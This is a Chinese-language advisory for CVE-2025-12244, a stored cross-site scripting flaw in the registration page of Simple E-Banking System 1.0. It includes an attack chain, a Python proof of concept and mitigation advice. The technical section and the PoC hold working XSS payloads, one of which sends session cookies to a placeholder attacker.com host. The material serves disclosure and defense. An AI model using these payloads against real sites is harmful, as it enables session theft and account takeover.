CVE-2025-12244 code-projects Simple E-Banking System 1.0 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-12244

漏洞类型

XSS (跨站脚本)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Simple E-Banking System 1.0

漏洞概述

CVE-2025-12244是存在于code-projects开源项目Simple E-Banking System 1.0版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞位于Web应用的注册功能模块，具体涉及/eBank/register.php文件中的Username参数。攻击者可以通过在用户注册时在用户名字段中注入恶意JavaScript脚本，当其他用户访问相关页面或触发特定功能时，恶意脚本将在受害者浏览器中执行，从而窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或执行其他恶意操作。由于该漏洞影响金融系统，攻击者可能利用此漏洞获取用户敏感金融信息，对用户和企业造成严重安全威胁。该漏洞已被公开披露且可被远程利用，无需高权限即可发起攻击。

技术细节

该漏洞为存储型XSS(Stored XSS)漏洞，存在于Simple E-Banking System 1.0的注册功能中。攻击者通过向/eBank/register.php的Username参数注入恶意JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=this.src='https://attacker.com/?c='+document.cookie>等Payload。由于应用程序未对用户输入进行充分的输入验证和输出编码，恶意脚本被存储在数据库中。当其他用户访问显示用户名的页面时，浏览器会解析并执行存储的恶意脚本。攻击者可利用此漏洞窃取用户会话令牌、修改页面内容、进行中间人攻击或传播恶意软件。在金融系统中，攻击者可能通过获取管理员凭证进一步入侵系统核心数据库。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标使用code-projects Simple E-Banking System 1.0，访问注册页面/eBank/register.php

STEP 2

步骤2: 构造恶意Payload

攻击者构造XSS恶意载荷，如<script>alert(document.cookie)</script>或图片标签载荷用于窃取Cookie

STEP 3

步骤3: 提交恶意注册请求

通过POST请求向/eBank/register.php提交包含恶意脚本的用户名参数

STEP 4

步骤4: 恶意脚本存储

应用程序未进行输入验证直接将恶意脚本存储到数据库中

STEP 5

步骤5: 触发XSS执行

当其他用户访问显示用户名的页面时，浏览器解析并执行存储的恶意脚本

STEP 6

步骤6: 窃取敏感信息

恶意脚本窃取用户会话Cookie或其他敏感信息并发送到攻击者控制的服务器

STEP 7

步骤7: 账户劫持

攻击者使用窃取的会话令牌劫持用户账户，可能进一步获取金融数据或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-12244 PoC - Simple E-Banking System 1.0 XSS # Target URL for registration target_url = "http://target.com/eBank/register.php" # Malicious XSS payload in Username field payload = { "Username": "<script>alert(document.cookie)</script>", "email": "[email protected]", "password": "Password123!", "confirm_password": "Password123!", "submit": "Register" } # Send malicious registration request response = requests.post(target_url, data=payload) # Check if payload was stored if response.status_code == 200: print("[+] XSS payload submitted successfully") print("[+] Payload: <script>alert(document.cookie)</script>") print("[+] When users view the username, XSS will be triggered") # Alternative payload for cookie stealing steal_payload = { "Username": "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">", "email": "[email protected]", "password": "Password123!", "confirm_password": "Password123!", "submit": "Register" } response2 = requests.post(target_url, data=steal_payload) print("[+] Cookie stealing payload also available")

影响范围

code-projects Simple E-Banking System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时措施：1)在前端和后端同时对Username字段进行严格输入验证，禁止<script>等危险标签和JavaScript事件属性；2)对所有输出到页面的用户数据执行HTML实体编码；3)配置Content-Security-Policy响应头禁止内联脚本执行；4)为会话Cookie启用HttpOnly和Secure标志；5)临时禁用注册功能或限制注册；6)部署WAF规则拦截XSS攻击特征；7)加强日志监控及时发现异常攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12244
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12244
3 Details https://www.cvedetails.com/cve/CVE-2025-12244/
4 VulDB https://vuldb.com/cve/CVE-2025-12244
5 Link https://code-projects.org/
6 Link https://github.com/asd1238525/cve/blob/main/xss5.md
7 Link https://vuldb.com/?ctiid.329915
8 Link https://vuldb.com/?id.329915
9 Link https://vuldb.com/?submit.673775